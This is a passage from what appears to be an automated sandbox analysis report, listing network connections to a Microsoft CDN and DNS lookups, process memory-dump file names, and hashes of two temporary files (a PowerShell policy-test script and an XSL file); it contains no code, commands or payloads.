| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 184.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
memory/1400-4-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-2-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-7-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-6-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-5-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-3-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-1-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp
memory/1400-0-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-8-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-9-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-10-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp
memory/1400-11-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-14-0x00007FFDAFC40000-0x00007FFDAFC50000-memory.dmp
memory/1400-13-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-12-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-33-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-42-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-41-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-44-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-45-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-47-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-46-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-40-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-43-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/3956-51-0x00000257F8390000-0x00000257F83B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqw43bwr.4uu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1400-68-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD27E0.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |
memory/1400-537-0x00007FFDF258D000-0x00007FFDF258E000-memory.dmp
memory/1400-538-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-548-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-549-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-550-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-551-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp
memory/1400-570-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-571-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-572-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-569-0x00007FFDB2570000-0x00007FFDB2580000-memory.dmp
memory/1400-573-0x00007FFDF24F0000-0x00007FFDF26E5000-memory.dmp